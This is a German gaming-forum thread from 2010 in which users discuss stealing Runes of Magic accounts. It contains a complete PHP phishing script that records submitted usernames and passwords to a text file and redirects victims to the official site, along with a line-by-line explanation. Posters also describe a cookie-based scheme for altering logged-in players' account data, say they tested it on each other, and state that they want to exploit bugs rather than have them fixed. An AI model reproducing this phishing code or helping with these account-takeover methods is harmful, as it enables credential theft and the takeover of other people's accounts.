jo.. kaum zu glauben aber wahr! ich bin irgendwie immer noch schockiert und mein kopf qualmt auch aber es klappt echt... echt mies !
ROM Account hacken
06/25/2010 16:51
wolleboiii#31
06/25/2010 19:08
Digital Shadow#32
Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?Quote:
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.
Wo bleibt mein obligatorischer Kuchen? :bandit:
Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.
Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.
06/25/2010 19:47
Deset#33
Krieg ich dann auch nen kuchen wenn ichs erklär? :D
das ganze schreibt $variable und $value in das text dokument usernames.txt
wenn man die fwrite befehle anguckt und sie mit dem Skin der seite vergleicht kommt das raus
fwrite($handle, $variable); => Username
fwrite($handle, "="); => E-mail
fwrite($handle, $value); => Passwort
fwrite($handle, "\r\n"); => Land
nun wenn $variable und $value gespeichert werden speichert es den Eintrag vom Benutzernamen und vom Passwort
Kucheeeeeeen :D
Quote:
<?php
header ('Location: http://www.runesofmagic.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
das ganze schreibt $variable und $value in das text dokument usernames.txt
wenn man die fwrite befehle anguckt und sie mit dem Skin der seite vergleicht kommt das raus
fwrite($handle, $variable); => Username
fwrite($handle, "="); => E-mail
fwrite($handle, $value); => Passwort
fwrite($handle, "\r\n"); => Land
nun wenn $variable und $value gespeichert werden speichert es den Eintrag vom Benutzernamen und vom Passwort
Kucheeeeeeen :D
06/25/2010 20:20
Viviphyd#34
Kuchen kriegen nur die jenigen die, die Frage richtig beantworten ^^.
Das der angegebene PHP-Code bzw das Video ein Tutorial für eine einfache Write-Methode die Username, Pw und etc von einer gefälschten RoM-Seite speichert brauchst du keinem erklären, das dürften die meisten hier wissen ;)
Die Frage oder besser die Forderung war, zu erklären wie bzw wieso es funktioniert das man mithilfe von Cookies die Benutzerdaten eines beliebigen (vorher eingeloggten) User umändern kann.
Erst dann gibs Kuchen ^^
Das der angegebene PHP-Code bzw das Video ein Tutorial für eine einfache Write-Methode die Username, Pw und etc von einer gefälschten RoM-Seite speichert brauchst du keinem erklären, das dürften die meisten hier wissen ;)
Die Frage oder besser die Forderung war, zu erklären wie bzw wieso es funktioniert das man mithilfe von Cookies die Benutzerdaten eines beliebigen (vorher eingeloggten) User umändern kann.
Erst dann gibs Kuchen ^^
06/25/2010 20:23
Atheuz#35
Vielleicht hättest du mal dir auch die ersten Beiträge durchlesen können, was ich erklärt habe war kein Phising oder sonst was, sondern eine alternative Methode. Lesen Jungs. :facepalm:Quote:
Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.
Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.
06/25/2010 20:24
Deset#36
so wie ich das verstanden hab hat das nichts mit cookies zu tun...Quote:
wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten
06/25/2010 21:38
Viviphyd#37
Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.Quote:
wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten
Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.
Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein.
Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^
06/25/2010 21:41
Deset#38
ich habe es zusammen mit ihm probiert und als versuchskaninchen fungiert und es hat geklappt ^^
06/26/2010 00:22
Atheuz#39
:handsdown: Endlich jemand der die Sache versteht, ja genau so könnte man das machen. Es funktioniert auch. Habs mit Deset und Wolleboii probiert.Quote:
Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.
Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein. Die anderen wissen nichtmal um was es geht.
Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^
Man müsste nur das ganze etwas verfeinern, das z.B anhand der IP ein eigener Benutzername mit PHP generiert wird und in einer Datenbank oder Textdatei gespeichert wird, oder das man lieber komplett Ajax verwendet. Ich schick dir das per PN.
06/27/2010 10:57
wolleboiii#40
genau , so würde das dann funktionieren. Der einzige Nachteil ist das die Leute eingeloggt sein müssen bei der yusho seite und ingame nicht eingeloggt sein dürfen... ansonsten eine super ... naja eher ziemlich böse sache ;)
aber es geht ja eh nur um die theorie :)
btw. morgen erstma *kaffee hebt*
aber es geht ja eh nur um die theorie :)
btw. morgen erstma *kaffee hebt*
06/28/2010 14:23
metinric#41
danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^
06/28/2010 14:36
anonymous-f4h279#42
Natürlich, ich bewerbe mich mal bei Frogster und sage ich helfe euch eure Server sicher zu machen.Quote:
So leicht wie du dir das vorstellst ist das nicht.
06/28/2010 14:37
Deset#43
wozu?Quote:
ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?
06/28/2010 14:56
anonymous-f4h279#44
Da stimme ich dir vollkommen zu.Quote:
ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?
Wir wollen Vorteile durch diese Bugs und sie nicht beheben lassen :D
06/28/2010 14:57
Emblionvirus#45
Schön das ihr so GEIL auf RoM Acc Hack seit... mir wurde mein Account gestern gehackt... Alles ist weg komplett alles....
und ich will jetzt auch einen RoM Acc hacken,damit ich bessere Sachen habe,ich habe das alles was auf dem Video steht gemacht,jeden Schritt verfolgt... Was muss ich als nächstes machen,wenn ich auf der erstellten Homepage alles gesavet habe usw...?
und ich will jetzt auch einen RoM Acc hacken,damit ich bessere Sachen habe,ich habe das alles was auf dem Video steht gemacht,jeden Schritt verfolgt... Was muss ich als nächstes machen,wenn ich auf der erstellten Homepage alles gesavet habe usw...?